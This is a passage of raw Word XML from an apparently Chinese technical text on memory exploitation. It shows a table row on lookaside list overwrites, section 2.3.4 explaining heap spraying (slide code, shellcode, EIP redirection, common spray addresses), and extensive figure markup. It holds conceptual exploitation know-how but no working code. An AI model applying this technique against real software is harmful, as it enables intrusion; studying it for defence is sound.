      <w:tr w:rsidR="002C1A85" w:rsidRPr="00CA5248" w14:paraId="2F417E0E" w14:textId="77777777" w:rsidTr="00DD2361">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66E41D43" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="422"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>覆盖lookaside</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>linked</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:b/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4894" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58437738" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="00884A96">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLineChars="200" w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA5248">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Vista后被移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E8DA956"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2.3.4 Heap Spraying </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA648A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虽然堆溢出漏洞并不容易实现，但仍有可以实现借助堆溢出执行Shellcode的方式，堆喷洒（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Heap Spraying</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）就是其中一种。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>堆</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>喷洒，即</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>向堆中注入大量数据，使得数据填满特定内存地址空间，当栈溢出时可以引导EIP到堆的空间</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553EAED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堆喷洒</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>可以是堆栈结合的攻击方式</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其注入数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Injected data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>lide code（滑板指令）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>Shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组成，由栈溢出修改返回地址，使EIP指向堆区的滑板指令，程序会顺着滑板指令顺序执行，直到执行到堆区的Shellcode。堆喷洒漏洞于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>2001年出现，2005年盛行，目前依然流行,常见于解释JavaScript的浏览器和PDF解释器</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C695CB"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当申请大量内存的时候，堆很有可能覆盖到的地址:0x0A0A0A0A（160M）， 0x0C0C0C0C（192M），0x0D0D0D0D （208M</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.20</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6D7A38" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:leftChars="-118" w:left="-248" w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpc">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="692F91C6" wp14:editId="60F85828">
                <wp:extent cx="5721985" cy="2647785"/>
                <wp:effectExtent l="0" t="0" r="0" b="635"/>
                <wp:docPr id="236" name="画布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6" name="文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="701662" y="1164743"/>
                            <a:ext cx="723265" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="18F0AC20" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>空闲内存</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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2907587" y="2350451"/>
                            <a:ext cx="463550" cy="254635"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="22ABCC70" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>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96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2777677" y="1544359"/>
                            <a:ext cx="596900" cy="304165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="1CD4D9B3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>100MB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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2777677" y="862957"/>
                            <a:ext cx="596900" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="093C814B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>200MB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96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2778568" y="275959"/>
                            <a:ext cx="596900" cy="304800"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="28DD5F0A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                                </w:rPr>
                                <w:t>300MB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文本框 96"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="701300" y="758082"/>
                            <a:ext cx="856615" cy="305435"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="73E2FDA1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
                                </w:rPr>
                                <w:t>已使用内存</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矩形 122"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="282835" y="796432"/>
                            <a:ext cx="418827" cy="229933"/>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4EE162FF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00747D3A"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3433888" y="134361"/>
                            <a:ext cx="1567811" cy="1804047"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="03FFB4A0" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00734F5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矩形 124"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3432997" y="1941850"/>
                            <a:ext cx="1563429" cy="153090"/>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2006BB8B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="004C22B0"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文本框 125"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="219387" y="127983"/>
                            <a:ext cx="1612265" cy="431165"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:ln w="6350">
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="150F459F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00962DDC" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:rPr>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00962DDC">
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>
                                  <w:sz w:val="28"/>
                                </w:rPr>
                                <w:t>常规情况下堆布局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矩形 126"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3433675" y="2420407"/>
                            <a:ext cx="1563583" cy="99947"/>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2D225008" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00A47BED"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3433675" y="2289583"/>
                            <a:ext cx="1563583" cy="126398"/>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78FB8957" w14:textId="77777777" w:rsidR="002C1A8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3433888" y="2201715"/>
                            <a:ext cx="1563370" cy="99695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3AB74038" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:hint="eastAsia"/>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3433675" y="2095136"/>
                            <a:ext cx="1563370" cy="126365"/>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3B7FD580" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                              <w:pPr>
                                <w:pStyle w:val="af9"/>
                                <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                                <w:jc w:val="both"/>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282835" y="1180228"/>
                            <a:ext cx="418465" cy="229870"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:style>
                          <a:lnRef idx="2">
                            <a:schemeClr val="dk1"/>
                          </a:lnRef>
                          <a:fillRef idx="1">
                            <a:schemeClr val="lt1"/>
                          </a:fillRef>
                          <a:effectRef idx="0">
                            <a:schemeClr val="dk1"/>
                          </a:effectRef>
                          <a:fontRef idx="minor">
                            <a:schemeClr val="dk1"/>
                          </a:fontRef>
                        </wps:style>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="370AFD1E" w14:textId="77777777" w:rsidR="002C1A8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2F91C6" id="画布 236" o:spid="_x0000_s1110" editas="canvas" style="width:450.55pt;height:208.5pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="57219,26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&#10;">
                <v:shape id="_x0000_s1111" type="#_x0000_t75" style="position:absolute;width:57219;height:26473;visibility:visible;mso-wrap-style:square">
                  <v:fill o:detectmouseclick="t"/>
                  <v:path o:connecttype="none"/>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1112" type="#_x0000_t202" style="position:absolute;left:7016;top:11647;width:7233;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PYwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0L/Q/LFHrTTSxIEl1FBCGH9tBU8TpkxySYnY27q8Z/3y0UepvH+5zVZjS9uJPznWUF6SwBQVxb&#10;3XGj4PC9n2YgfEDW2FsmBU/ysFm/TFZYaPvgL7pXoRExhH2BCtoQhkJKX7dk0M/sQBy5s3UGQ4Su&#10;kdrhI4abXs6TZCENdhwbWhxo11J9qW5Gwecur7Jy/nSn/L3cV9k1tR/ZUam313G7BBFoDP/iP3ep&#10;4/x0Ab/PxAvk+gcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA03oPYwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="18F0AC20" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>空闲内存</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:shape id="文本框 96" o:spid="_x0000_s1113" type="#_x0000_t202" style="position:absolute;left:29075;top:23504;width:4636;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ZDwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qJgptTF1FBCEHPTQqvQ7ZaRKanY27q8Z/7xYKvc3jfc5yPZhO3Mj51rKCdJqAIK6s&#10;brlWcDruXjMQPiBr7CyTggd5WK9GL0vMtb3zJ93KUIsYwj5HBU0IfS6lrxoy6Ke2J47ct3UGQ4Su&#10;ltrhPYabTs6S5E0abDk2NNjTtqHqp7waBYftosyK2cN9LebFrswuqd1nZ6Um42HzASLQEP7Ff+5C&#10;x/npO/w+Ey+QqycAAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAW5ImQ8MAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" stroked="f" strokeweight=".5pt">
                  <v:textbox>
                    <w:txbxContent>
                      <w:p w14:paraId="22ABCC70" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
